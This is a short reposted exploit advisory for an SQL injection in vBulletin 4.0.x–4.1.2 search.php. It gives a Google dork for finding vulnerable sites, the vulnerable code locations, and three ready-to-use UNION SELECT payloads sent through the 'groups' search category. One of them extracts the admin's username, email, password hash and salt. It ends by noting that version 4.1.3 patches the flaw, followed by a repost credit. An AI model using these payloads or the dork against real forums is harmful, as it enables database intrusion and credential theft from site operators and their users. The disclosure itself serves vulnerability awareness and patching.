====================================================================#vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#====================================================================# ## 888 d8 888 _ 888 ,d d8 ## e88~\888 d88 888-~\ 888 e~ ~ 888-~88e ,d888 _d88__ ## d888 888 d888 888 888d8b 888 888b 888 888 ## 8888 888 / 888 888 888Y88b 888 8888 888 888 ## Y888 888 /__888__ 888 888 Y88b 888 888P 888 888 ## "88_/888 888 888 888 Y88b 888-_88" 888 "88_/ ## #====================================================================#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#====================================================================#[+] Discovered By : D4rkB1t#[+] Site : NaN#[+] support e-mail : d4rkb1t@live.comProduct: http://www.vbulletin.comVersion: 4.0.xDork : inurl:"search.php?search_type=1"--------------------------# ~Vulnerable Codes~ #--------------------------/vb
/search/searchtools.php - line 715;/packages/vbforum/search/type/socialgroup.php - line 201:203;--------------------------# ~Exploit~ #--------------------------POST data on "Search Multiple Content Types" => "groups"&cat[0]=1) UNION SELECT database()#&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#More info: http://j0hnx3r.org/?p=818--------------------------# ~Advice~ #--------------------------Vendor already released a patch on vb
#4.1.3.UPDATE NOW!
本文转自enables 51CTO博客,原文链接:http://blog.51cto.com/niuzu/580967,如需转载请自行联系原作者
